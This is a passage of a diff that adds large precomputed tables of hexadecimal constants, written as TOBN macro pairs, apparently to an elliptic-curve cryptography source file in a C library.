+     TOBN(0x04c0d063, 0x60b045bf), TOBN(0xdb652edc, 0x10e52d01),
+     TOBN(0x50ef932c, 0x03ec6627), TOBN(0xde1b3b2d, 0xc1ee50e3),
+     TOBN(0x5ab7bdc5, 0xdc37a90d), TOBN(0xfea67213, 0x31e33a96),
+     TOBN(0x6482b5cb, 0x4f2999aa), TOBN(0x38476cc6, 0xb8cbf0dd),
+     TOBN(0x93ebfacb, 0x173405bb), TOBN(0x15cdafe7, 0xe52369ec),
+     TOBN(0xd42d5ba4, 0xd935b7db), TOBN(0x648b6004, 0x1c99a4cd),
+     TOBN(0x785101bd, 0xa3b5545b), TOBN(0x4bf2c38a, 0x9dd67faf),
+     TOBN(0xb1aadc63, 0x4442449c), TOBN(0xe0e9921a, 0x33ad4fb8),
+     TOBN(0x5c552313, 0xaa686d82), TOBN(0xdee635fa, 0x465d866c),
+     TOBN(0xbc3c224a, 0x18ee6e8a), TOBN(0xeed748a6, 0xed42e02f),
+     TOBN(0xe70f930a, 0xd474cd08), TOBN(0x774ea6ec, 0xfff24adf),
+     TOBN(0x03e2de1c, 0xf3480d4a), TOBN(0xf0d8edc7, 0xbc8acf1a),
+     TOBN(0xf23e3303, 0x68295a9c), TOBN(0xfadd5f68, 0xc546a97d),
+     TOBN(0x895597ad, 0x96f8acb1), TOBN(0xbddd49d5, 0x671bdae2),
+     TOBN(0x16fcd528, 0x21dd43f4), TOBN(0xa5a45412, 0x6619141a)}
+    ,
+    {TOBN(0x8ce9b6bf, 0xc360e25a), TOBN(0xe6425195, 0x075a1a78),
+     TOBN(0x9dc756a8, 0x481732f4), TOBN(0x83c0440f, 0x5432b57a),
+     TOBN(0xc670b3f1, 0xd720281f), TOBN(0x2205910e, 0xd135e051),
+     TOBN(0xded14b0e, 0xdb052be7), TOBN(0x697b3d27, 0xc568ea39),
+     TOBN(0x2e599b9a, 0xfb3ff9ed), TOBN(0x28c2e0ab, 0x17f6515c),
+     TOBN(0x1cbee4fd, 0x474da449), TOBN(0x071279a4, 0x4f364452),
+     TOBN(0x97abff66, 0x01fbe855), TOBN(0x3ee394e8, 0x5fda51c4),
+     TOBN(0x190385f6, 0x67597c0b), TOBN(0x6e9fccc6, 0xa27ee34b),
+     TOBN(0x0b89de93, 0x14092ebb), TOBN(0xf17256bd, 0x428e240c),
+     TOBN(0xcf89a7f3, 0x93d2f064), TOBN(0x4f57841e, 0xe1ed3b14),
+     TOBN(0x4ee14405, 0xe708d855), TOBN(0x856aae72, 0x03f1c3d0),
+     TOBN(0xc8e5424f, 0xbdd7eed5), TOBN(0x3333e4ef, 0x73ab4270),
+     TOBN(0x3bc77ade, 0xdda492f8), TOBN(0xc11a3aea, 0x78297205),
+     TOBN(0x5e89a3e7, 0x34931b4c), TOBN(0x17512e2e, 0x9f5694bb),
+     TOBN(0x5dc349f3, 0x177bf8b6), TOBN(0x232ea4ba, 0x08c7ff3e),
+     TOBN(0x9c4f9d16, 0xf511145d), TOBN(0xccf109a3, 0x33b379c3),
+     TOBN(0xe75e7a88, 0xa1f25897), TOBN(0x7ac6961f, 0xa1b5d4d8),
+     TOBN(0xe3e10773, 0x08f3ed5c), TOBN(0x208a54ec, 0x0a892dfb),
+     TOBN(0xbe826e19, 0x78660710), TOBN(0x0cf70a97, 0x237df2c8),
+     TOBN(0x418a7340, 0xed704da5), TOBN(0xa3eeb9a9, 0x08ca33fd),
+     TOBN(0x49d96233, 0x169bca96), TOBN(0x04d286d4, 0x2da6aafb),
+     TOBN(0xc09606ec, 0xa0c2fa94), TOBN(0x8869d0d5, 0x23ff0fb3),
+     TOBN(0xa99937e5, 0xd0150d65), TOBN(0xa92e2503, 0x240c14c9),
+     TOBN(0x656bf945, 0x108e2d49), TOBN(0x152a733a, 0xa2f59e2b),
+     TOBN(0xb4323d58, 0x8434a920), TOBN(0xc0af8e93, 0x622103c5),
+     TOBN(0x667518ef, 0x938dbf9a), TOBN(0xa1843073, 0x83a9cdf2),
+     TOBN(0x350a94aa, 0x5447ab80), TOBN(0xe5e5a325, 0xc75a3d61),
+     TOBN(0x74ba507f, 0x68411a9e), TOBN(0x10581fc1, 0x594f70c5),
+     TOBN(0x60e28570, 0x80eb24a9), TOBN(0x7bedfb4d, 0x488e0cfd),
+     TOBN(0x721ebbd7, 0xc259cdb8), TOBN(0x0b0da855, 0xbc6390a9),
+     TOBN(0x2b4d04db, 0xde314c70), TOBN(0xcdbf1fbc, 0x6c32e846),
+     TOBN(0x33833eab, 0xb162fc9e), TOBN(0x9939b48b, 0xb0dd3ab7),
+     TOBN(0x5aaa98a7, 0xcb0c9c8c), TOBN(0x75105f30, 0x81c4375c),
+     TOBN(0xceee5057, 0x5ef1c90f), TOBN(0xb31e065f, 0xc23a17bf),
+     TOBN(0x5364d275, 0xd4b6d45a), TOBN(0xd363f3ad, 0x62ec8996),
+     TOBN(0xb5d21239, 0x4391c65b), TOBN(0x84564765, 0xebb41b47),
+     TOBN(0x20d18ecc, 0x37107c78), TOBN(0xacff3b6b, 0x570c2a66),
+     TOBN(0x22f975d9, 0x9bd0d845), TOBN(0xef0a0c46, 0xba178fa0),
+     TOBN(0x1a419651, 0x76b6028e), TOBN(0xc49ec674, 0x248612d4),
+     TOBN(0x5b6ac4f2, 0x7338af55), TOBN(0x06145e62, 0x7bee5a36),
+     TOBN(0x33e95d07, 0xe75746b5), TOBN(0x1c1e1f6d, 0xc40c78be),
+     TOBN(0x967833ef, 0x222ff8e2), TOBN(0x4bedcf6a, 0xb49180ad),
+     TOBN(0x6b37e9c1, 0x3d7a4c8a), TOBN(0x2748887c, 0x6ddfe760),
+     TOBN(0xf7055123, 0xaa3a5bbc), TOBN(0x954ff225, 0x7bbb8e74),
+     TOBN(0xc42b8ab1, 0x97c3dfb9), TOBN(0x55a549b0, 0xcf168154),
+     TOBN(0xad6748e7, 0xc1b50692), TOBN(0x2775780f, 0x6fc5cbcb),
+     TOBN(0x4eab80b8, 0xe1c9d7c8), TOBN(0x8c69dae1, 0x3fdbcd56),
+     TOBN(0x47e6b4fb, 0x9969eace), TOBN(0x002f1085, 0xa705cb5a),
+     TOBN(0x4e23ca44, 0x6d3fea55), TOBN(0xb4ae9c86, 0xf4810568),
+     TOBN(0x47bfb91b, 0x2a62f27d), TOBN(0x60deb4c9, 0xd9bac28c),
+     TOBN(0xa892d894, 0x7de6c34c), TOBN(0x4ee68259, 0x4494587d),
+     TOBN(0x914ee14e, 0x1a3f8a5b), TOBN(0xbb113eaa, 0x28700385),
+     TOBN(0x81ca03b9, 0x2115b4c9), TOBN(0x7c163d38, 0x8908cad1),
+     TOBN(0xc912a118, 0xaa18179a), TOBN(0xe09ed750, 0x886e3081),
+     TOBN(0xa676e3fa, 0x26f516ca), TOBN(0x753cacf7, 0x8e732f91),
+     TOBN(0x51592aea, 0x833da8b4), TOBN(0xc626f42f, 0x4cbea8aa),
+     TOBN(0xef9dc899, 0xa7b56eaf), TOBN(0x00c0e52c, 0x34ef7316),
+     TOBN(0x5b1e4e24, 0xfe818a86), TOBN(0x9d31e20d, 0xc538be47),
+     TOBN(0x22eb932d, 0x3ed68974), TOBN(0xe44bbc08, 0x7c4e87c4),
+     TOBN(0x4121086e, 0x0dde9aef), TOBN(0x8e6b9cff, 0x134f4345),
+     TOBN(0x96892c1f, 0x711b0eb9), TOBN(0xb905f2c8, 0x780ab954),
+     TOBN(0xace26309, 0xa20792db), TOBN(0xec8ac9b3, 0x0684e126),
+     TOBN(0x486ad8b6, 0xb40a2447), TOBN(0x60121fc1, 0x9fe3fb24),
+     TOBN(0x5626fccf, 0x1a8e3b3f), TOBN(0x4e568622, 0x6ad1f394),
+     TOBN(0xda7aae0d, 0x196aa5a1), TOBN(0xe0df8c77, 0x1041b5fb),
+     TOBN(0x451465d9, 0x26b318b7), TOBN(0xc29b6e55, 0x7ab136e9),
+     TOBN(0x2c2ab48b, 0x71148463), TOBN(0xb5738de3, 0x64454a76),
+     TOBN(0x54ccf9a0, 0x5a03abe4), TOBN(0x377c0296, 0x0427d58e),
+     TOBN(0x73f5f0b9, 0x2bb39c1f), TOBN(0x14373f2c, 0xe608d8c5),
+     TOBN(0xdcbfd314, 0x00fbb805), TOBN(0xdf18fb20, 0x83afdcfb),
+     TOBN(0x81a57f42, 0x42b3523f), TOBN(0xe958532d, 0x87f650fb),
+     TOBN(0xaa8dc8b6, 0x8b0a7d7c), TOBN(0x1b75dfb7, 0x150166be),
+     TOBN(0x90e4f7c9, 0x2d7d1413), TOBN(0x67e2d6b5, 0x9834f597),
+     TOBN(0x4fd4f4f9, 0xa808c3e8), TOBN(0xaf8237e0, 0xd5281ec1),
+     TOBN(0x25ab5fdc, 0x84687cee), TOBN(0xc5ded6b1, 0xa5b26c09),
+     TOBN(0x8e4a5aec, 0xc8ea7650), TOBN(0x23b73e5c, 0x14cc417f),
+     TOBN(0x2bfb4318, 0x3037bf52), TOBN(0xb61e6db5, 0x78c725d7),
+     TOBN(0x8efd4060, 0xbbb3e5d7), TOBN(0x2e014701, 0xdbac488e),
+     TOBN(0xac75cf9a, 0x360aa449), TOBN(0xb70cfd05, 0x79634d08),
+     TOBN(0xa591536d, 0xfffb15ef), TOBN(0xb2c37582, 0xd07c106c),
+     TOBN(0xb4293fdc, 0xf50225f9), TOBN(0xc52e175c, 0xb0e12b03),
+     TOBN(0xf649c3ba, 0xd0a8bf64), TOBN(0x745a8fef, 0xeb8ae3c6),
+     TOBN(0x30d7e5a3, 0x58321bc3), TOBN(0xb1732be7, 0x0bc4df48),
+     TOBN(0x1f217993, 0xe9ea5058), TOBN(0xf7a71cde, 0x3e4fd745),
+     TOBN(0x86cc533e, 0x894c5bbb), TOBN(0x6915c7d9, 0x69d83082),
+     TOBN(0xa6aa2d05, 0x5815c244), TOBN(0xaeeee592, 0x49b22ce5),
+     TOBN(0x89e39d13, 0x78135486), TOBN(0x3a275c1f, 0x16b76f2f),
+     TOBN(0xdb6bcc1b, 0xe036e8f5), TOBN(0x4df69b21, 0x5e4709f5),
+     TOBN(0xa188b250, 0x2d0f39aa), TOBN(0x622118bb, 0x15a85947),
+     TOBN(0x2ebf520f, 0xfde0f4fa), TOBN(0xa40e9f29, 0x4860e539),
+     TOBN(0x7b6a51eb, 0x22b57f0f), TOBN(0x849a33b9, 0x7e80644a),
+     TOBN(0x50e5d16f, 0x1cf095fe), TOBN(0xd754b54e, 0xec55f002),
+     TOBN(0x5cfbbb22, 0x236f4a98), TOBN(0x0b0c59e9, 0x066800bb),
+     TOBN(0x4ac69a8f, 0x5a9a7774), TOBN(0x2b33f804, 0xd6bec948),
+     TOBN(0xb3729295, 0x32e6c466), TOBN(0x68956d0f, 0x4e599c73),
+     TOBN(0xa47a249f, 0x155c31cc), TOBN(0x24d80f0d, 0xe1ce284e),
+     TOBN(0xcd821dfb, 0x988baf01), TOBN(0xe6331a7d, 0xdbb16647),
+     TOBN(0x1eb8ad33, 0x094cb960), TOBN(0x593cca38, 0xc91bbca5),
+     TOBN(0x384aac8d, 0x26567456), TOBN(0x40fa0309, 0xc04b6490),
+     TOBN(0x97834cd6, 0xdab6c8f6), TOBN(0x68a7318d, 0x3f91e55f),
+     TOBN(0xa00fd04e, 0xfc4d3157), TOBN(0xb56f8ab2, 0x2bf3bdea),
+     TOBN(0x014f5648, 0x4fa57172), TOBN(0x948c5860, 0x450abdb3),
+     TOBN(0x342b5df0, 0x0ebd4f08), TOBN(0x3e5168cd, 0x0e82938e),
+     TOBN(0x7aedc1ce, 0xb0df5dd0), TOBN(0x6bbbc6d9, 0xe5732516),
+     TOBN(0xc7bfd486, 0x605daaa6), TOBN(0x46fd72b7, 0xbb9a6c9e),
+     TOBN(0xe4847fb1, 0xa124fb89), TOBN(0x75959cbd, 0xa2d8ffbc),
+     TOBN(0x42579f65, 0xc8a588ee), TOBN(0x368c92e6, 0xb80b499d),
+     TOBN(0xea4ef6cd, 0x999a5df1), TOBN(0xaa73bb7f, 0x936fe604),
+     TOBN(0xf347a70d, 0x6457d188), TOBN(0x86eda86b, 0x8b7a388b),
+     TOBN(0xb7cdff06, 0x0ccd6013), TOBN(0xbeb1b6c7, 0xd0053fb2),
+     TOBN(0x0b022387, 0x99240a9f), TOBN(0x1bbb384f, 0x776189b2),
+     TOBN(0x8695e71e, 0x9066193a), TOBN(0x2eb50097, 0x06ffac7e),
+     TOBN(0x0654a9c0, 0x4a7d2caa), TOBN(0x6f3fb3d1, 0xa5aaa290),
+     TOBN(0x835db041, 0xff476e8f), TOBN(0x540b8b0b, 0xc42295e4),
+     TOBN(0xa5c73ac9, 0x05e214f5), TOBN(0x9a74075a, 0x56a0b638),
+     TOBN(0x2e4b1090, 0xce9e680b), TOBN(0x57a5b479, 0x6b8d9afa),
+     TOBN(0x0dca48e7, 0x26bfe65c), TOBN(0x097e391c, 0x7290c307),
+     TOBN(0x683c462e, 0x6669e72e), TOBN(0xf505be1e, 0x062559ac),
+     TOBN(0x5fbe3ea1, 0xe3a3035a), TOBN(0x6431ebf6, 0x9cd50da8),
+     TOBN(0xfd169d5c, 0x1f6407f2), TOBN(0x8d838a95, 0x60fce6b8),
+     TOBN(0x2a2bfa7f, 0x650006f0), TOBN(0xdfd7dad3, 0x50c0fbb2),
+     TOBN(0x92452495, 0xccf9ad96), TOBN(0x183bf494, 0xd95635f9),
+     TOBN(0x02d5df43, 0x4a7bd989), TOBN(0x505385cc, 0xa5431095),
+     TOBN(0xdd98e67d, 0xfd43f53e), TOBN(0xd61e1a6c, 0x500c34a9),
+     TOBN(0x5a4b46c6, 0x4a8a3d62), TOBN(0x8469c4d0, 0x247743d2),
+     TOBN(0x2bb3a13d, 0x88f7e433), TOBN(0x62b23a10, 0x01be5849),
+     TOBN(0xe83596b4, 0xa63d1a4c), TOBN(0x454e7fea, 0x7d183f3e),
+     TOBN(0x643fce61, 0x17afb01c), TOBN(0x4e65e5e6, 0x1c4c3638),
+     TOBN(0x41d85ea1, 0xef74c45b), TOBN(0x2cfbfa66, 0xae328506),
+     TOBN(0x98b078f5, 0x3ada7da9), TOBN(0xd985fe37, 0xec752fbb),
+     TOBN(0xeece68fe, 0x5a0148b4), TOBN(0x6f9a55c7, 0x2d78136d),
+     TOBN(0x232dccc4, 0xd2b729ce), TOBN(0xa27e0dfd, 0x90aafbc4),
+     TOBN(0x96474452, 0x12b4603e), TOBN(0xa876c551, 0x6b706d14),
+     TOBN(0xdf145fcf, 0x69a9d412), TOBN(0xe2ab75b7, 0x2d479c34),
+     TOBN(0x12df9a76, 0x1a23ff97), TOBN(0xc6138992, 0x5d359d10),
+     TOBN(0x6e51c7ae, 0xfa835f22), TOBN(0x69a79cb1, 0xc0fcc4d9),
+     TOBN(0xf57f350d, 0x594cc7e1), TOBN(0x3079ca63, 0x3350ab79),
+     TOBN(0x226fb614, 0x9aff594a), TOBN(0x35afec02, 0x6d59a62b),
+     TOBN(0x9bee46f4, 0x06ed2c6e), TOBN(0x58da1735, 0x7d939a57),
+     TOBN(0x44c50402, 0x8fd1797e), TOBN(0xd8853e7c, 0x5ccea6ca),
+     TOBN(0x4065508d, 0xa35fcd5f), TOBN(0x8965df8c, 0x495ccaeb),
+     TOBN(0x0f2da850, 0x12e1a962), TOBN(0xee471b94, 0xc1cf1cc4),
+     TOBN(0xcef19bc8, 0x0a08fb75), TOBN(0x704958f5, 0x81de3591),
+     TOBN(0x2867f8b2, 0x3aef4f88), TOBN(0x8d749384, 0xea9f9a5f),
+     TOBN(0x1b385537, 0x8c9049f4), TOBN(0x5be948f3, 0x7b92d8b6),
+     TOBN(0xd96f725d, 0xb6e2bd6b), TOBN(0x37a222bc, 0x958c454d),
+     TOBN(0xe7c61abb, 0x8809bf61), TOBN(0x46f07fbc, 0x1346f18d),
+     TOBN(0xfb567a7a, 0xe87c0d1c), TOBN(0x84a461c8, 0x7ef3d07a),
+     TOBN(0x0a5adce6, 0xd9278d98), TOBN(0x24d94813, 0x9dfc73e1),
+     TOBN(0x4f3528b6, 0x054321c3), TOBN(0x2e03fdde, 0x692ea706),
+     TOBN(0x10e60619, 0x47b533c0), TOBN(0x1a8bc73f, 0x2ca3c055),
+     TOBN(0xae58d4b2, 0x1bb62b8f), TOBN(0xb2045a73, 0x584a24e3),
+     TOBN(0x3ab3d5af, 0xbd76e195), TOBN(0x478dd1ad, 0x6938a810),
+     TOBN(0x6ffab393, 0x6ee3d5cb), TOBN(0xdfb693db, 0x22b361e4),
+     TOBN(0xf9694496, 0x51dbf1a7), TOBN(0xcab4b4ef, 0x08a2e762),
+     TOBN(0xe8c92f25, 0xd39bba9a), TOBN(0x850e61bc, 0xf1464d96),
+     TOBN(0xb7e830e3, 0xdc09508b), TOBN(0xfaf6d2cf, 0x74317655),
+     TOBN(0x72606ceb, 0xdf690355), TOBN(0x48bb92b3, 0xd0c3ded6),
+     TOBN(0x65b75484, 0x5c7cf892), TOBN(0xf6cd7ac9, 0xd5d5f01f),
+     TOBN(0xc2c30a59, 0x96401d69), TOBN(0x91268650, 0xed921878),
+     TOBN(0x380bf913, 0xb78c558f), TOBN(0x43c0baeb, 0xc8afdaa9),
+     TOBN(0x377f61d5, 0x54f169d3), TOBN(0xf8da07e3, 0xae5ff20b),
+     TOBN(0xb676c49d, 0xa8a90ea8), TOBN(0x81c1ff2b, 0x83a29b21),
+     TOBN(0x383297ac, 0x2ad8d276), TOBN(0x3001122f, 0xba89f982),
+     TOBN(0xe1d794be, 0x6718e448), TOBN(0x246c1482, 0x7c3e6e13),
+     TOBN(0x56646ef8, 0x5d26b5ef), TOBN(0x80f5091e, 0x88069cdd),
+     TOBN(0xc5992e2f, 0x724bdd38), TOBN(0x02e915b4, 0x8471e8c7),
+     TOBN(0x96ff320a, 0x0d0ff2a9), TOBN(0xbf886487, 0x4384d1a0),
+     TOBN(0xbbe1e6a6, 0xc93f72d6), TOBN(0xd5f75d12, 0xcad800ea),
+     TOBN(0xfa40a09f, 0xe7acf117), TOBN(0x32c8cdd5, 0x7581a355),
+     TOBN(0x74221992, 0x7023c499), TOBN(0xa8afe5d7, 0x38ec3901),
+     TOBN(0x5691afcb, 0xa90e83f0), TOBN(0x41bcaa03, 0x0b8f8eac),
+     TOBN(0xe38b5ff9, 0x8d2668d5), TOBN(0x0715281a, 0x7ad81965),
+     TOBN(0x1bc8fc7c, 0x03c6ce11), TOBN(0xcbbee6e2, 0x8b650436),
+     TOBN(0x06b00fe8, 0x0cdb9808), TOBN(0x17d6e066, 0xfe3ed315),
+     TOBN(0x2e9d38c6, 0x4d0b5018), TOBN(0xab8bfd56, 0x844dcaef),
+     TOBN(0x42894a59, 0x513aed8b), TOBN(0xf77f3b6d, 0x314bd07a),
+     TOBN(0xbbdecb8f, 0x8e42b582), TOBN(0xf10e2fa8, 0xd2390fe6),
+     TOBN(0xefb95022, 0x62a2f201), TOBN(0x4d59ea50, 0x50ee32b0),
+     TOBN(0xd87f7728, 0x6da789a8), TOBN(0xcf98a2cf, 0xf79492c4),
+     TOBN(0xf9577239, 0x720943c2), TOBN(0xba044cf5, 0x3990b9d0),
+     TOBN(0x5aa8e823, 0x95f2884a), TOBN(0x834de6ed, 0x0278a0af),
+     TOBN(0xc8e1ee9a, 0x5f25bd12), TOBN(0x9259ceaa, 0x6f7ab271),
+     TOBN(0x7e6d97a2, 0x77d00b76), TOBN(0x5c0c6eea, 0xa437832a),
+     TOBN(0x5232c20f, 0x5606b81d), TOBN(0xabd7b375, 0x0d991ee5),
+     TOBN(0x4d2bfe35, 0x8632d951), TOBN(0x78f85146, 0x98ed9364),
+     TOBN(0x951873f0, 0xf30c3282), TOBN(0x0da8ac80, 0xa789230b),
+     TOBN(0x3ac7789c, 0x5398967f), TOBN(0xa69b8f7f, 0xbdda0fb5),
+     TOBN(0xe5db7717, 0x6add8545), TOBN(0x1b71cb66, 0x72c49b66),
+     TOBN(0xd8560739, 0x68421d77), TOBN(0x03840fe8, 0x83e3afea),
+     TOBN(0xb391dad5, 0x1ec69977), TOBN(0xae243fb9, 0x307f6726),
+     TOBN(0xc88ac87b, 0xe8ca160c), TOBN(0x5174cced, 0x4ce355f4),
+     TOBN(0x98a35966, 0xe58ba37d), TOBN(0xfdcc8da2, 0x7817335d),
+     TOBN(0x5b752830, 0x83fbc7bf), TOBN(0x68e419d4, 0xd9c96984),
+     TOBN(0x409a39f4, 0x02a40380), TOBN(0x88940faf, 0x1fe977bc),
+     TOBN(0xc640a94b, 0x8f8edea6), TOBN(0x1e22cd17, 0xed11547d),
+     TOBN(0xe28568ce, 0x59ffc3e2), TOBN(0x60aa1b55, 0xc1dee4e7),
+     TOBN(0xc67497c8, 0x837cb363), TOBN(0x06fb438a, 0x105a2bf2),
+     TOBN(0x30357ec4, 0x500d8e20), TOBN(0x1ad9095d, 0x0670db10),
+     TOBN(0x7f589a05, 0xc73b7cfd), TOBN(0xf544607d, 0x880d6d28),
+     TOBN(0x17ba93b1, 0xa20ef103), TOBN(0xad859130, 0x6ba6577b),
+     TOBN(0x65c91cf6, 0x6fa214a0), TOBN(0xd7d49c6c, 0x27990da5),
+     TOBN(0xecd9ec8d, 0x20bb569d), TOBN(0xbd4b2502, 0xeeffbc33),
+     TOBN(0x2056ca5a, 0x6bed0467), TOBN(0x7916a1f7, 0x5b63728c),
+     TOBN(0xd4f9497d, 0x53a4f566), TOBN(0x89734664, 0x97b56810),
+     TOBN(0xf8e1da74, 0x0494a621), TOBN(0x82546a93, 0x8d011c68),
+     TOBN(0x1f3acb19, 0xc61ac162), TOBN(0x52f8fa9c, 0xabad0d3e),
+     TOBN(0x15356523, 0xb4b7ea43), TOBN(0x5a16ad61, 0xae608125),
+     TOBN(0xb0bcb87f, 0x4faed184), TOBN(0x5f236b1d, 0x5029f45f),
+     TOBN(0xd42c7607, 0x0bc6b1fc), TOBN(0xc644324e, 0x68aefce3),
+     TOBN(0x8e191d59, 0x5c5d8446), TOBN(0xc0208077, 0x13ae1979),
+     TOBN(0xadcaee55, 0x3ba59cc7), TOBN(0x20ed6d6b, 0xa2cb81ba),
+     TOBN(0x0952ba19, 0xb6efcffc), TOBN(0x60f12d68, 0x97c0b87c),
+     TOBN(0x4ee2c7c4, 0x9caa30bc), TOBN(0x767238b7, 0x97fbff4e),
+     TOBN(0xebc73921, 0x501b5d92), TOBN(0x3279e3df, 0xc2a37737),
+     TOBN(0x9fc12bc8, 0x6d197543), TOBN(0xfa94dc6f, 0x0a40db4e),
+     TOBN(0x7392b41a, 0x530ccbbd), TOBN(0x87c82146, 0xea823525),
+     TOBN(0xa52f984c, 0x05d98d0c), TOBN(0x2ae57d73, 0x5ef6974c),
+     TOBN(0x9377f7bf, 0x3042a6dd), TOBN(0xb1a007c0, 0x19647a64),
+     TOBN(0xfaa9079a, 0x0cca9767), TOBN(0x3d81a25b, 0xf68f72d5),
+     TOBN(0x752067f8, 0xff81578e), TOBN(0x78622150, 0x9045447d),
+     TOBN(0xc0c22fcf, 0x0505aa6f), TOBN(0x1030f0a6, 0x6bed1c77),
+     TOBN(0x31f29f15, 0x1f0bd739), TOBN(0x2d7989c7, 0xe6debe85),
+     TOBN(0x5c070e72, 0x8e677e98), TOBN(0x0a817bd3, 0x06e81fd5),
+     TOBN(0xc110d830, 0xb0f2ac95), TOBN(0x48d0995a, 0xab20e64e),
+     TOBN(0x0f3e00e1, 0x7729cd9a), TOBN(0x2a570c20, 0xdd556946),
+     TOBN(0x912dbcfd, 0x4e86214d), TOBN(0x2d014ee2, 0xcf615498),
+     TOBN(0x55e2b1e6, 0x3530d76e), TOBN(0xc5135ae4, 0xfd0fd6d1),
+     TOBN(0x0066273a, 0xd4f3049f), TOBN(0xbb8e9893, 0xe7087477),
+     TOBN(0x2dba1ddb, 0x14c6e5fd), TOBN(0xdba37886, 0x51f57e6c),
+     TOBN(0x5aaee0a6, 0x5a72f2cf), TOBN(0x1208bfbf, 0x7bea5642),
+     TOBN(0xf5c6aa3b, 0x67872c37), TOBN(0xd726e083, 0x43f93224),
+     TOBN(0x1854daa5, 0x061f1658), TOBN(0xc0016df1, 0xdf0cd2b3),
+     TOBN(0xc2a3f23e, 0x833d50de), TOBN(0x73b681d2, 0xbbbd3017),
+     TOBN(0x2f046dc4, 0x3ac343c0), TOBN(0x9c847e7d, 0x85716421),
+     TOBN(0xe1e13c91, 0x0917eed4), TOBN(0x3fc9eebd, 0x63a1b9c6),
+     TOBN(0x0f816a72, 0x7fe02299), TOBN(0x6335ccc2, 0x294f3319),
+     TOBN(0x3820179f, 0x4745c5be), TOBN(0xe647b782, 0x922f066e),
+     TOBN(0xc22e49de, 0x02cafb8a), TOBN(0x299bc2ff, 0xfcc2eccc),
+     TOBN(0x9a8feea2, 0x6e0e8282), TOBN(0xa627278b, 0xfe893205),
+     TOBN(0xa7e19733, 0x7933e47b), TOBN(0xf4ff6b13, 0x2e766402),
+     TOBN(0xa4d8be0a, 0x98440d9f), TOBN(0x658f5c2f, 0x38938808),
+     TOBN(0x90b75677, 0xc95b3b3e), TOBN(0xfa044269, 0x3137b6ff),
+     TOBN(0x077b039b, 0x43c47c29), TOBN(0xcca95dd3, 0x8a6445b2),
+     TOBN(0x0b498ba4, 0x2333fc4c), TOBN(0x274f8e68, 0xf736a1b1),
+     TOBN(0x6ca348fd, 0x5f1d4b2e), TOBN(0x24d3be78, 0xa8f10199),
+     TOBN(0x8535f858, 0xca14f530), TOBN(0xa6e7f163, 0x5b982e51),
+     TOBN(0x847c8512, 0x36e1bf62), TOBN(0xf6a7c58e, 0x03448418),
+     TOBN(0x583f3703, 0xf9374ab6), TOBN(0x864f9195, 0x6e564145),
+     TOBN(0x33bc3f48, 0x22526d50), TOBN(0x9f323c80, 0x1262a496),
+     TOBN(0xaa97a7ae, 0x3f046a9a), TOBN(0x70da183e, 0xdf8a039a),
+     TOBN(0x5b68f71c, 0x52aa0ba6), TOBN(0x9be0fe51, 0x21459c2d),
+     TOBN(0xc1e17eb6, 0xcbc613e5), TOBN(0x33131d55, 0x497ea61c),
+     TOBN(0x2f69d39e, 0xaf7eded5), TOBN(0x73c2f434, 0xde6af11b),
+     TOBN(0x4ca52493, 0xa4a375fa), TOBN(0x5f06787c, 0xb833c5c2),
+     TOBN(0x814e091f, 0x3e6e71cf), TOBN(0x76451f57, 0x8b746666)}
+    ,
+    {TOBN(0x80f9bdef, 0x694db7e0), TOBN(0xedca8787, 0xb9fcddc6),
+     TOBN(0x51981c34, 0x03b8dce1), TOBN(0x4274dcf1, 0x70e10ba1),
+     TOBN(0xf72743b8, 0x6def6d1a), TOBN(0xd25b1670, 0xebdb1866),
+     TOBN(0xc4491e8c, 0x050c6f58), TOBN(0x2be2b2ab, 0x87fbd7f5),
+     TOBN(0x3e0e5c9d, 0xd111f8ec), TOBN(0xbcc33f8d, 0xb7c4e760),
+     TOBN(0x702f9a91, 0xbd392a51), TOBN(0x7da4a795, 0xc132e92d),
+     TOBN(0x1a0b0ae3, 0x0bb1151b), TOBN(0x54febac8, 0x02e32251),
+     TOBN(0xea3a5082, 0x694e9e78), TOBN(0xe58ffec1, 0xe4fe40b8),
+     TOBN(0xf85592fc, 0xd1e0cf9e), TOBN(0xdea75f0d, 0xc0e7b2e8),
+     TOBN(0xc04215cf, 0xc135584e), TOBN(0x174fc727, 0x2f57092a),
+     TOBN(0xe7277877, 0xeb930bea), TOBN(0x504caccb, 0x5eb02a5a),
+     TOBN(0xf9fe08f7, 0xf5241b9b), TOBN(0xe7fb62f4, 0x8d5ca954),
+     TOBN(0xfbb8349d, 0x29c4120b), TOBN(0x9f94391f, 0xc0d0d915),
+     TOBN(0xc4074fa7, 0x5410ba51), TOBN(0xa66adbf6, 0x150a5911),
+     TOBN(0xc164543c, 0x34bfca38), TOBN(0xe0f27560, 0xb9e1ccfc),
+     TOBN(0x99da0f53, 0xe820219c), TOBN(0xe8234498, 0xc6b4997a),
+     TOBN(0xcfb88b76, 0x9d4c5423), TOBN(0x9e56eb10, 0xb0521c49),
+     TOBN(0x418e0b5e, 0xbe8700a1), TOBN(0x00cbaad6, 0xf93cb58a),
+     TOBN(0xe923fbde, 0xd92a5e67), TOBN(0xca4979ac, 0x1f347f11),
+     TOBN(0x89162d85, 0x6bc0585b), TOBN(0xdd6254af, 0xac3c70e3),
+     TOBN(0x7b23c513, 0x516e19e4), TOBN(0x56e2e847, 0xc5c4d593),
+     TOBN(0x9f727d73, 0x5ce71ef6), TOBN(0x5b6304a6, 0xf79a44c5),
+     TOBN(0x6638a736, 0x3ab7e433), TOBN(0x1adea470, 0xfe742f83),
+     TOBN(0xe054b854, 0x5b7fc19f), TOBN(0xf935381a, 0xba1d0698),
+     TOBN(0x546eab2d, 0x799e9a74), TOBN(0x96239e0e, 0xa949f729),
+     TOBN(0xca274c6b, 0x7090055a), TOBN(0x835142c3, 0x9020c9b0),
+     TOBN(0xa405667a, 0xa2e8807f), TOBN(0x29f2c085, 0x1aa3d39e),
+     TOBN(0xcc555d64, 0x42fc72f5), TOBN(0xe856e0e7, 0xfbeacb3c),
+     TOBN(0xb5504f9d, 0x918e4936), TOBN(0x65035ef6, 0xb2513982),
+     TOBN(0x0553a0c2, 0x6f4d9cb9), TOBN(0x6cb10d56, 0xbea85509),
+     TOBN(0x48d957b7, 0xa242da11), TOBN(0x16a4d3dd, 0x672b7268),
+     TOBN(0x3d7e637c, 0x8502a96b), TOBN(0x27c7032b, 0x730d463b),
+     TOBN(0xbdc02b18, 0xe4136a14), TOBN(0xbacf969d, 0x678e32bf),
+     TOBN(0xc98d89a3, 0xdd9c3c03), TOBN(0x7b92420a, 0x23becc4f),
+     TOBN(0xd4b41f78, 0xc64d565c), TOBN(0x9f969d00, 0x10f28295),
